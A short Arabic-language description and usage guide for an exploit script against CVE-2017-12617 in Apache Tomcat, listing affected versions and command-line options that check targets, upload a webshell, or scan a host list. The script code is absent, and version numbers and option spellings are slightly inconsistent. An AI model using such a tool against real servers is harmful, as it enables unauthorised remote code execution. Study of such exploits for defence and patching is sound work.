
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - تجاوز رفع ملفات JSP / تنفيذ الأكواد عن بُعد
CVE-2017-12617 ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تم اكتشافها في Apache Tomcat
تؤثر على الأنظمة التي يتم فيها تمكين HTTP PUTs (عبر تعيين معلمة "read-only" للـ Default servlet إلى "false") فهي معرضة للخطر.
إصدارات Tomcat قبل 9.0.1 (Beta) و 8.5.23 و 8.0.47 و 7.0.82 تحتوي على خطورة محتملة
ثغرة لتنفيذ التعليمات البرمجية عن بُعد (RCE) على جميع أنظمة التشغيل إذا تم تكوين الـ default servlet مع
تعيين المعلمة readonly إلى false أو إذا تم تمكين الـ WebDAV servlet مع
تعيين المعلمة readonly إلى false
./cve-2017-12617.py [options]
الخيارات:
-u ,--url [::] التحقق مما إذا كان عنوان URL الهدف معرضًا للخطر
-p,--pwn [::] إنشاء webshell ورفعه
-l,--list [::] قائمة المضيفين
[+]الاستخدام:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt